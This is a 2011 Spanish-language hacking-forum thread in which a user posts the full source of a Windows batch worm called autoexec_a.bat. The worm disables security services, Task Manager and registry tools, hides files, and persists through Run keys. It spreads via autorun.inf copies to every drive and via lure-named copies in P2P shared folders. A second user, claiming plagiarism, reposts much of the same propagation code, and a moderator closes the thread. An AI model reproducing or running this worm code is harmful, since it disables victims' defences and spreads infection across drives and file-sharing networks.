elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  virus autoexec_a.bat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: virus autoexec_a.bat  (Leído 3,120 veces)
W4rR3d

Desconectado Desconectado

Mensajes: 12


Ver Perfil
virus autoexec_a.bat
« en: 3 Febrero 2011, 22:50 pm »

 me gusta la programacion en batch y en visual besic script y un poco de seguridad informatica. aca les dejo una de mis creaciones espero que lo corrijan si ven un error
su amigo W4rR3d  - AAHH. San Martin- Av. maria galan - Piura -Peru
este virus informatico se llama autoexec_a.bat, esta creado en batch

Código
  1. @echo off
  2. :: este virus fue creado por hacked by W4rR3d
  3. :: este virus esta dedicado a la comunidad hacker piura- peru
  4. msg * hacked by -={W4rR3d}=-
  5. Set inic= %programfiles%
  6. tasskill /im explorer.exe /f>nul 2>&1 || taskill explorer>nul 2>&1
  7. net stop "Security Center"
  8. net stop "centro de seguridad"
  9. net stop "SharedAccess"
  10. reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
  11. reg add "HKCUSoftwareMicrosoftWindowsCurrentversionPoliciesSystem" /v DisableTaskMgr /t reg_dword /d 1 /f
  12. reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableRegistryTools /t reg_dword /d 1 /f
  13. reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v CheckedValue /t reg_dword /d 1 /f
  14. reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v Hidden /t REG_DWORD /d 2 /f
  15. reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v HideFileExt /t REG_DWORD /d 1 /f
  16. reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  17. for /F %%- in (MSMemoticon,PhotoshopCS4,FreeXXXPhotos,Office2009,VideosCaidasHumor,videosporn,wallpapers,wormgenerator) do (call :p2prop %%-)
  18. copy /y "%0" "%homedrive%\autoexec_a.bat">nul 2>&1
  19. reg add hklm\software\microsoft\windows\currentversion\run /v systemwar /t reg_sz /d %homedrive%\autoexec_a.bat /f
  20. echo.[Autorun] >> %homedrive%\Autorun.inf
  21. echo.label=Pendrive >> %homedrive%\Autorun.inf
  22. echo.action=Abrir Pendrive >> %homedrive%\Autorun.inf
  23. echo.shellexecute="/autoexec_a.bat" >> %homedrive%\Autorun.inf
  24. for %%# in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
  25. copy /Y "%homedrive%\autorun.inf" "%%#:\autorun.inf">nul 2>&1
  26. copy /Y "%0" "%%#:\autoexec_a.bat">nul 2>&1
  27. attrib +R +S +H "%%#:\autorun.inf">nul 2>&1
  28. attrib +R +S +H "%%#:\autoexec_a.bat">nul 2>&1
  29. )
  30. (echo.^<HTML^>
  31. echo.%^<HEAD^>
  32. echo.^<title^>HACKED BY W4rR3d^</title^>
  33. echo.^</HEAD^>
  34. echo.^<BODY^>
  35. echo.^<H1^>         ~~~HACKED BY W4rR3d~~~
  36. echo.^</BODY^>
  37. echo.^</HTML^>)>%homedrive%\IDEAS.HTML
  38. REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ddjsys /t REG_SZ /d %homedrive%\IDEAS.HTML
  39. )
  40. start %homedrive%\IDEAS.HTML
  41. :p2prop
  42. set var=%1
  43. copy /y "%0" "%inic%\Morpheus\My Shared Folder\%var%.bat">nul 2>&1
  44. copy /y "%0" "%inic%\ICQ\shared files\%var%.bat">nul 2>&1
  45. copy /y "%0" "%inic%\KaZaA\My Shared Folder\%var%.bat">nul 2>&1
  46. copy /y "%0" "%inic%\Shareaza\Downloads\%var%.bat">nul 2>&1
  47. copy /y "%0" "%inic%\EDONKEY2000\incoming\%var%.bat">nul 2>&1
  48. copy /y "%0" "%inic%\eMule\Incoming\%var%.bat">nul 2>&1
  49. copy /y "%0" "%inic%\Filetopia3\Files\%var%.bat">nul 2>&1
  50. copy /y "%0" "%inic%\XoloX\Downloads\%var%.bat">nul 2>&1
  51. copy /y "%0" "%inic%\Gnucleus\Downloads\%var%.bat">nul 2>&1
  52. copy /y "%0" "%inic%\LimeWire\Shared\%var%.bat">nul 2>&1
  53. copy /y "%0" "%inic%\Grokster\My Grokster\%var%.bat">nul 2>&1
  54. copy /y "%0" "%inic%\Overnet\incoming\%var%.bat">nul 2>&1
  55. copy /y "%0" "%appdata%\Ares\My Shared Folder\%var%.bat">nul 2>&1
  56. copy /y "%0" "%inic%\Swaptor\Download\%var%.bat">nul 2>&1
  57. copy /y "%0" "%inic%\WinMX\My Shared Folder\%var%.bat">nul 2>&1
  58. copy /y "%0" "%inic%\Tesla\Files\%var%.bat">nul 2>&1
  59. copy /y "%0" "%inic%\BearShare\Shared\%var%.bat">nul 2>&1
  60. copy /y "%0" "%inic%\Rapigator\Share\%var%.bat">nul 2>&1
  61. copy /y "%0" "%inic%\KaZaA Lite\My Shared Folder\%var%.bat">nul 2>&1
  62. copy /y "%0" "%inic%\KMD\My Shared Folder\%var%.bat">nul 2>&1
  63. copy /y "%0" "%inic%\appleJuice\incoming\%var%.bat">nul 2>&1
  64. copy /y "%0" "%programfiles%\Direct Connect\Received Files\%var%.bat">nul 2>&1
  65. goto:eof


« Última modificación: 3 Febrero 2011, 23:26 pm por Leo Gutiérrez. » En línea

xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: virus autoexec_a.bat
« Respuesta #1 en: 3 Febrero 2011, 22:57 pm »

Que pena que algunas partes del código sean exactamente IGUAL a un "virus" que programé hace dos años. :rolleyes:


En línea

kingdarnakes

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Re: virus autoexec_a.bat
« Respuesta #2 en: 3 Febrero 2011, 23:12 pm »

Que pena que algunas partes del código sean exactamente IGUAL a un "virus" que programé hace dos años. :rolleyes:

Nadie lo duda, pero sino aportas pruebas yo también puedo decir que lo hice yo.

Aunque viendo el post no me estraña que sea un ripper porque no ha usado etiquetas y se notan ciertas partes de diferente estilo con respecto a la programación y al nivel.
En línea

xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: virus autoexec_a.bat
« Respuesta #3 en: 3 Febrero 2011, 23:30 pm »

Nadie lo duda, pero sino aportas pruebas yo también puedo decir que lo hice yo.

Aunque viendo el post no me estraña que sea un ripper porque no ha usado etiquetas y se notan ciertas partes de diferente estilo con respecto a la programación y al nivel.

En el código original no era IDEAS.html, era IEAS:
Código
  1. :IEAS
  2. (ECHO.^<HTML^>
  3. ECHO.^<HEAD^>
  4. ECHO.^<title^>HACKED BY [antiguo_nick_mio]^</title^>
  5. ECHO.^</HEAD^>
  6. ECHO.^<BODY^>
  7. ECHO.^<H1^>                  ~~~HACKED BY [antiguo_nick_mio]~~~
  8. ECHO.^</BODY^>
  9. ECHO.^</HTML^>)>%HOMEDRIVE%\IEAS.HTML
  10. REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v aErx_sys /t REG_SZ /d "%HOMEDRIVE%\IEAS.HTML"
  11. ATTRIB +H %HOMEDRIVE\IEAS.HTML
  12. GOTO:EOF
  13.  


Esta linea:
Código
  1. tasskill /im explorer.exe /f>nul 2>&1 || taskill explorer>nul 2>&1
copiada tal cual de otro virus mío que llamé "BaTr00t_a".

Código
  1. for %%# in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
  2. copy /Y "%homedrive%\autorun.inf" "%%#:\autorun.inf">nul 2>&1
  3. copy /Y "%0" "%%#:\baTr00t_a.bat">nul 2>&1
  4. attrib +R +S +H "%%#:\autorun.inf">nul 2>&1
  5. attrib +R +S +H "%%#:\baTr00t_a.bat">nul 2>&1
  6. )
Lo mismo con esta parte, que el ripper no fue muy hábil porque como podeis ver en el código tiene puesto autoexec_a (conservando el _a).


Y esta parte:
Código
  1. :p2prop
  2. set var=%1
  3. copy /y "%0" "%programfiles%\Morpheus\My Shared Folder\%var%.bat">nul 2>&1
  4. copy /y "%0" "%programfiles%\ICQ\shared files\%var%.bat">nul 2>&1
  5. copy /y "%0" "%programfiles%\KaZaA\My Shared Folder\%var%.bat">nul 2>&1
  6. copy /y "%0" "%programfiles%\Shareaza\Downloads\%var%.bat">nul 2>&1
  7. copy /y "%0" "%programfiles%\EDONKEY2000\incoming\%var%.bat">nul 2>&1
  8. copy /y "%0" "%programfiles%\eMule\Incoming\%var%.bat">nul 2>&1
  9. copy /y "%0" "%programfiles%\Filetopia3\Files\%var%.bat">nul 2>&1
  10. copy /y "%0" "%programfiles%\XoloX\Downloads\%var%.bat">nul 2>&1
  11. copy /y "%0" "%programfiles%\Gnucleus\Downloads\%var%.bat">nul 2>&1
  12. copy /y "%0" "%programfiles%\LimeWire\Shared\%var%.bat">nul 2>&1
  13. copy /y "%0" "%programfiles%\Grokster\My Grokster\%var%.bat">nul 2>&1
  14. copy /y "%0" "%programfiles%\Overnet\incoming\%var%.bat">nul 2>&1
  15. copy /y "%0" "%appdata%\Ares\My Shared Folder\%var%.bat">nul 2>&1
  16. copy /y "%0" "%programfiles%\Swaptor\Download\%var%.bat">nul 2>&1
  17. copy /y "%0" "%programfiles%\WinMX\My Shared Folder\%var%.bat">nul 2>&1
  18. copy /y "%0" "%programfiles%\Tesla\Files\%var%.bat">nul 2>&1
  19. copy /y "%0" "%programfiles%\BearShare\Shared\%var%.bat">nul 2>&1
  20. copy /y "%0" "%programfiles%\Rapigator\Share\%var%.bat">nul 2>&1
  21. copy /y "%0" "%programfiles%\KaZaA Lite\My Shared Folder\%var%.bat">nul 2>&1
  22. copy /y "%0" "%programfiles%\KMD\My Shared Folder\%var%.bat">nul 2>&1
  23. copy /y "%0" "%programfiles%\appleJuice\incoming\%var%.bat">nul 2>&1
  24. copy /y "%0" "%programfiles%\Direct Connect\Received Files\%var%.bat">nul 2>&1
  25. goto:eof
  26.  
Ya ni siquiera se molestó en modificarla.


La creación del autorun.inf lo mismo.



En realidad todo es mío, solo que el mío se auto-ocultaba con VBScript y se autoejecutaba con una bomba fork.


No aporto links para no hacer spam, pero en google podeis encontrarlo.

Pero vamos, que me da igual, que sigan rippeando, así llegarán lejos.


Saludos!
« Última modificación: 3 Febrero 2011, 23:33 pm por pablomi » En línea

kingdarnakes

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Re: virus autoexec_a.bat
« Respuesta #4 en: 3 Febrero 2011, 23:36 pm »

Doy fe de ello... Ahora mismo lo acabo de comprobar...

Citar
solo que el mío se auto-ocultaba con VBScript y se autoejecutaba con una bomba fork.

No sabría para que se usaba esa parte de código o no le gustaría y por eso la borro  :silbar:.

Lastima que no pueda reportar el mensaje a un moderador, espero que lo vea alguno, odio a los ripper...  >:D
En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: virus autoexec_a.bat
« Respuesta #5 en: 3 Febrero 2011, 23:37 pm »

Código
  1. tasskill /im explorer.exe /f>nul 2>&1 || taskill explorer>nul 2>&1

Es taskkill, no tasskill ni taskill.

Bueno, cierro el tema, no aployo el plagio de código, además de que los "virus" en Batch son una *****.
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines